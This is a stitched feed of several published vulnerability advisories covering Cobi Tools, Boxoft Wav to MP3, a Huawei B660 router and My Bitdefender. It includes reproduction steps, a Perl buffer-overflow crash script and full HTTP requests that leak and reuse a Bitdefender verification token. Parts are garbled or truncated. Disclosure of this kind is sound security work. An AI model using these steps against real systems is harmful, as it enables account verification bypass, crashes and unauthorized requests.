in the idevice settings. The execution point of the bug occurs in the message body of the eventlog email. The content of the eventlog that generates the email is not parsed at all. The security risk of the web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the web vulnerability requires a low privilege ios device account with restricted access and low user interaction. Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context. Vulnerable Module(s) [+] EventLog Vulnerable Input(s): [+] name Vulnerable Parameter(s) [+] devicename Affected Module(s) [+] Mail Message Body (Email) Proof of Concept (PoC): ======================= The persistent validation vulnerability can be exploited by attackers with low privilege iOS device user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Install the application to your idevice (iphone or ipad) 2. Start the mobile application 3. Open the idevice ios settigs 4. Change the devicename to a maliciousc script code test payload 5. Save the entry and open the installed application again 6. Move to the eventlog and click on top the email button 7. The email opens and the execute takes place in the message body context 8. Successful reproduce of the vulnerability! Payload:



log.txt

ÿþL

ÿþL


Solution - Fix & Patch: ======================= The solution is to parse the devicename of the ios device within the email message body context. Disallow the usage of special chars for devicenames in the app to prevent local exploitation. Security Risk: ============== The security risk of the persistent input validation vulnerability in the cobi tools application is estimated as medium. (CVSS 3.5) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [http://ift.tt/1TDrAB7.] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: http://ift.tt/1jnqRwA - www.vuln-lab.com - http://ift.tt/1kouTut Section: magazine.vulnerability-lab.com - http://ift.tt/1zNuo47 - http://ift.tt/1wo6y8x Social: twitter.com/vuln_lab - http://ift.tt/1kouSqa - http://youtube.com/user/vulnerability0lab Feeds: http://ift.tt/1iS1DH0 - http://ift.tt/1kouSqh - http://ift.tt/1kouTKS Programs: http://ift.tt/1iS1GCs - http://ift.tt/1iS1FyF - http://ift.tt/1oSBx0A Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™

Source: Gmail -> IFTTT-> Blogger

[FD] Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability

Document Title: =============== Boxoft Wav v1.1.0.0 - Buffer Overflow Vulnerability References (Source): ==================== http://ift.tt/2jk3TOm Release Date: ============= 2017-01-09 Vulnerability Laboratory ID (VL-ID): ==================================== 2027 Common Vulnerability Scoring System: ==================================== 5.8 Product & Service Introduction: =============================== Boxoft Wav to MP3 Converter is an 100% free powerful audio conversion tool that lets you to batch convert WAV file to high quality MP3 audio formats, It is equipped with a standard audio compressed encoder, you can select bitrate settings and convert multiple files at once. Another convenience feature is hot directory (Watch Folder to convert Audio); it can be converted to mp3 format automatically when the source wav files are written to a specified monitored directory. (Copy of the Vendor Homepage: http://ift.tt/1RbD2QC ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local buffer overflow vulnerability in the official Boxoft Wav to MP3 v1.1.0.0 software. Vulnerability Disclosure Timeline: ================================== 2017-01-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Boxoft Product: Wav to MP3 - Player (Software) 1.1.0.0 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official Boxoft Wav to MP3 (freeware) V1.1.0.0 software. The local vulnerability allows local attackers to overwrite the registers to compromise the local software system process. The classic unicode buffer overflow vulnerability is located in the `Add` function of the `Play` module. Local attackers are able to load special crafted files that overwrites the eip register to compromise the local system process of the software. An attacker can manipulate thebit EIP register to execute the next instruction of their choice. Attackers are able to execute arbitrary code with the privileges of the software process. Local attackers can exploit the issue by an include of a 18kb unicode payload as txt file to add for the play module. The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 5.8. Exploitation of the vulnerability requires a low privilege or restricted system user account without user interaction. Successful exploitation of the vulnerability results in computer system manipulation and compromise of the computer system. Proof of Concept (PoC): ======================= The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Download and install the "setup(free-wav-to-mp3)" file 2. Run the poc code via active perl or perl 3. A file format "poc.txt" will be created 4. Click "ADD" and upload the (poc.txt) Name > POC.txt Size > 18KB Full file name : C:UsersDellDesktopPoc.txt 5. Click "Play" Note: Software will crash with an unhandled exception and critical access violation 6. Successful reproduce of the local buffer overflow vulnerability! PoC: Exploitation (Perl) #!/usr/bin/perl my $Buff = "x41" x 9000; open(MYFILE,'>>poc.txt'); print MYFILE $Buff; close(MYFILE); print "SaifAllah benMassaoud";

Source: Gmail -> IFTTT-> Blogger

[FD] Huawei Flybox B660 - (POST Reboot) CSRF Vulnerability

Document Title: =============== Huawei Flybox B660 - (POST Reboot) CSRF Vulnerability References (Source): ==================== http://ift.tt/2jde0Fj Release Date: ============= 2017-01-10 Vulnerability Laboratory ID (VL-ID): ==================================== 2025 Common Vulnerability Scoring System: ==================================== 4.4 Product & Service Introduction: =============================== The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660. (Copy of the Homepage: http://ift.tt/2fCoRcS ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series. Vulnerability Disclosure Timeline: ================================== 2017-01-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Huawei Product: Flybox - Router (Web-Application) B660 3G/4G Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A remote cross-site request forgery (CSRF) vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series. The security vulnerability allows remote attackers to submit special requests to the affected product which could lead reboot the Product. The vulnerability is located in the `/htmlcode/html/reboot.cgi` and `/htmlcode/html/system_reboot.asp` file modules and `RequestFile` parameter of the localhost path URL. Remote attackers are able to reboot any Huawei Flybox B660 via unauthenticated POST method request. The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4. Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected device backend modules. Request Method(s): [+] POST Vulnerable Module(s): [+] /htmlcode/html/reboot.cgi [+] /htmlcode/html/system_reboot.asp Vulnerable Parameter(s): [+] RequestFile Software version of the modem: 1066.12.15.01.200 Hardware version of the modem: WLB3TCLU Name of the device: B660 Hardware version of the router: WL1B660I001 Software version of the router: 1066.11.15.02.110sp01 Proof of Concept (PoC): ======================= The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Source: Gmail -> IFTTT-> Blogger

[FD] Bit Defender #39 - Auth Token Bypass Vulnerability

Document Title: =============== Bit Defender #39 - Auth Token Bypass Vulnerability References (Source): ==================== http://ift.tt/2j6VUHO Release Date: ============= 2017-01-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1683 Common Vulnerability Scoring System: ==================================== 5.9 Product & Service Introduction: =============================== Bitdefender is a Romanian internet security software company, represented through subsidiaries and partners in over 100 countries. The company has been developing online protection since 2001. At September 2014 Bitdefender technologies were installed in around 500 million home and corporate devices across the globe. (Copy of the Homepage: http://ift.tt/1Dw5OZ2 ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a remote session token bypass vulnerability in the official Bitdefender online service web-application (my.bitdefender). Vulnerability Disclosure Timeline: ================================== 2016-01-25: Researcher Notification & Coordination (Lawrence Amer) 2016-01-26: Vendor Notification (Bitdefender Security Team) 2016-02-03: Vendor Response/Feedback (Bitdefender Security Team) 2016-12-01: Vendor Fix/Patch (Bitdefender Developer Team) 2016-12-31: Security Acknowledgements (Bitdefender Security Team) 2017-01-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Bitdefender Product: My Bitdefender - Online Service (Web-Application) 2016 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A token bypass vulnerability has been discovered in the official Bitdefender online service web-application (my.bitdefender). The vulnerability allows remote attackers to bypass the secure protection mechanism of verification procedure in the online-service. A vulnerability allows remote attackers to bypass the token which responsible for confirming the owner of current email address to get a confirmed account from bitdefender for security products. The vulnerability considerd as method followed by remote attackers to bypass the correct method of verfication . and located in module which reponsible for registering new customers [/lv2/account?login=] . a semia col added to parameter [ action] which expose the verfication token , which used later for bypassing. The security risk of the token filter bypass web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.9. Exploitation of the token filter bypass web vulnerability requires no privileged user account or user interaction. Successful exploitation of the vulnerability results in unauthorized verification of user credentials in the online service web-application. Request Method: [+] GET Vulnerable Module: [+] /lv2/account?login= Vulnerable Parameter(s): [+] [action] Affected Domain(s): [+] my.bitdefender.com Proof of Concept (PoC): ======================= The token bypass web vulnerability can be exploited by a remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerbility ... 1. The remote attacker registers wih my.bitdefender.com , after registration the current status of un-verfied accounts is [4] while the [1] is verfied 2. Now the attacker add a semia col to action parameter like: action=' with GET Request: GET /lv2/account?login=vulnerabilitybugtrue@mail.com&pass=[EMAIL_CURRENT_PASSWORD]&action=;&type=userpass&fp=web&lang=en_us&beta=true HTTP/1.1 Host: my.bitdefender.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ift.tt/1LofCms Cookie: s_vi=[CS]v1|2B4FB32A051D2F01-6000190280001A6A[CE]; bd112=lY5LDoIwFEX30qQjCf1BsCTGgTp0BdYBlCpNLMXHI5gY9i4LYICzM7j35Ny%2BZIQXKUmL2JeGGTZNU1p7bNzDdY2D1MZg2ODRGXatfLewq8C2hh3fByoLqi5UnXx47gawVJ0%2Fu9g5gAgL9xBDj1TuCyr1MiQJQR%2FcgFXoSSmyXEnNVcHn5P8KGzusLBom1q1abLWu%2FQXncnPVWAePa54iU7nO5%2FsP; visid_incap_444053=meSoTqUSRwCAL8O9SNbIZW5zn1YAAAAAQUIPAAAAAABtAdmh8HM0LDXk6stcsU0R; __qca=P0-565467393-1453315617095; trh3=AWsAlP%2BVbGRto4xjbW6TbmNtrpFdWXiUbGZsrqZiVFl3VaWZpaacl5GIppdUb6VtZV5dS66go5iWaGZhVGKnpmaimGegW49ecWOVlaBqVWOWY3ZtVKiboJibl4qqo1Rvm21kXFhcb2xiaGdsbqWgpg%3D%3D; shsid=11947017; rerew4=W56TmuvVMT0%2BDwA%3D; oidfg4=m5qTnLt4AQA%3D; fsd2=m5qTnLt4AQA%3D; __cfduid=dd46406ce24e76b99369c3c1422d61a881453744387; _ga=GA1.3.875146899.1453769753; bdselcid=en; country_id=en; _country=sy; _cbml=%7B%22name%22%3A%22en_us%22%7D; _cbmrb=false; _cbme=%22%22; _cbmci=%22%22; _gat=1 Connection: keep-alive 3. Got this response which will leak the verfication token Response : HTTP/1.1 200 OK Server: cloudflare-nginx Date: Tue, 26 Jan 2016 01:31:41 GMT Content-Type: application/json Connection: keep-alive X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Content-Type-Options: nosniff CF-RAY: 26a875b0da9f356c-LHR Content-Length: 229 { "preferences": "{"lang": "en_us"}", "country_id": "204", "token": "2OZ6INMWmWythZEonNWQjsy4GtE", "error": "pending", "passmd5": "e807f1fcf82d132f9bb018ca6738a19f", "login": "vulnerabilitybugtrue@mail.com" } 4. The last step is to use the token that was leaked from previous step GET /lv2/act_pending?token=2OZ6INMWmWythZEonNWQjsy4GtE&redirect_uri=https%3A%2F%2Fmy.bitdefender.com%2Fdashboard%3F HTTP/1.1 Host: my.bitdefender.com User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate

Source: Gmail -> IFTTT-> Blogger